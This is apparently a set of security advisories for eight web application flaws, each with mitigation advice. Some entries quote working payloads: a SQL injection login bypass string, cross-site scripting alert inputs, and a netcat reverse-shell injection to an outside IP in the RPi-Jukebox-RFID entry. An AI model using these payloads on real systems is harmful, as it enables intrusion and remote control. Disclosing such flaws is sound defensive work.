Torada

**Name of the Vulnerable Software and Affected Versions** RaspAP raspap-webgui version 3.0.9 **Description** A critical issue affects the processing of the file includes/provider.php in the HTTP POST Request Handler component. The manipulation of the `country` argument leads to code injection. This issue can be exploited remotely. The vendor was contacted about this disclosure but did not respond. **Recommendations** For RaspAP raspap-webgui version 3.0.9, consider disabling the `includes/provider.php` file or restricting access to the HTTP POST Request Handler component until a patch is available. Avoid using the `country` argument in the affected API endpoint until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** SourceCodester Complaint Management System version 1.0 **Description** A critical issue affects the Lodge Complaint Section component, specifically the file users/register-complaint.php, leading to unrestricted upload. The attack can be initiated remotely. The issue has been publicly disclosed and may be exploited. **Recommendations** For SourceCodester Complaint Management System version 1.0, consider disabling the `users/register-complaint.php` file or restricting access to the Lodge Complaint Section until a patch is available. As a temporary workaround, restrict the upload functionality in the affected component to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** SourceCodester Complete File Management System version 1.0 **Description** A critical issue was found in the Login Form component of the affected software, specifically in the file users/index.php. The `username` argument is vulnerable to manipulation, which can lead to SQL injection when input like `torada%27+or+%271%27+%3D+%271%27+--+-` is used. This issue can be exploited remotely. **Recommendations** For SourceCodester Complete File Management System version 1.0, consider disabling the Login Form component or restricting access to the `users/index.php` file until a patch is available. Avoid using the `username` argument in the affected login functionality to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** SourceCodester Complete File Management System version 1.0 **Description** A critical vulnerability has been found in the Admin Login Form component of the file /admin/. The manipulation of the `username` argument with a specific input leads to SQL injection. The attack can be launched remotely. **Recommendations** For SourceCodester Complete File Management System version 1.0, as a temporary workaround, consider restricting access to the `/admin/` endpoint until a patch is available. Avoid using the `username` argument in the affected Admin Login Form until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** MiczFlor RPi-Jukebox-RFID versions up to 2.5.0 **Description** A critical issue affects some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument `folder` with the input `;nc 104.236.1.147 4444 -e /bin/bash;` leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. **Recommendations** For MiczFlor RPi-Jukebox-RFID versions up to 2.5.0, as a temporary workaround, consider disabling the HTTP Request Handler component until a patch is available. Restrict access to the userScripts.php file to minimize the risk of exploitation. Avoid using the `folder` argument in the affected HTTP Request Handler until the issue is resolved. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Project Worlds Student Project Allocation System version 1.0 **Description** A vulnerability was found in the Admin Login Module, specifically affecting the file admin login.php. The issue allows for cross-site scripting through the manipulation of the `msg` argument with a malicious input, such as `test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E`. This can be initiated remotely. The exploit has been publicly disclosed. **Recommendations** For Project Worlds Student Project Allocation System version 1.0, as a temporary workaround, consider restricting access to the `admin login.php` file and the `msg` argument in the Admin Login Module to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.

**Name of the Vulnerable Software and Affected Versions** Project Worlds Online Time Table Generator version 1.0 **Description** A critical issue was found in the file course ajax.php, where the manipulation of the `id` argument leads to sql injection. This can be initiated remotely. The issue has been publicly disclosed and may be exploited. **Recommendations** For Project Worlds Online Time Table Generator version 1.0, as a temporary workaround, consider restricting access to the `course ajax.php` file or disabling the manipulation of the `id` argument until a patch is available. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** Project Worlds Visitor Management System version 1.0 **Description** A vulnerability was found in the Project Worlds Visitor Management System. It has been classified as problematic and affects an unknown function of the file dataset.php of the component URL Handler. The manipulation of the argument `name` with the input "><script>alert('torada')</script> leads to cross-site scripting. It is possible to launch the attack remotely. **Recommendations** For Project Worlds Visitor Management System version 1.0, consider disabling the `dataset.php` file or restricting access to it until a patch is available. Avoid using the `name` argument in the affected URL Handler component to minimize the risk of exploitation. At the moment, there is no information about a newer version that contains a fix for this vulnerability.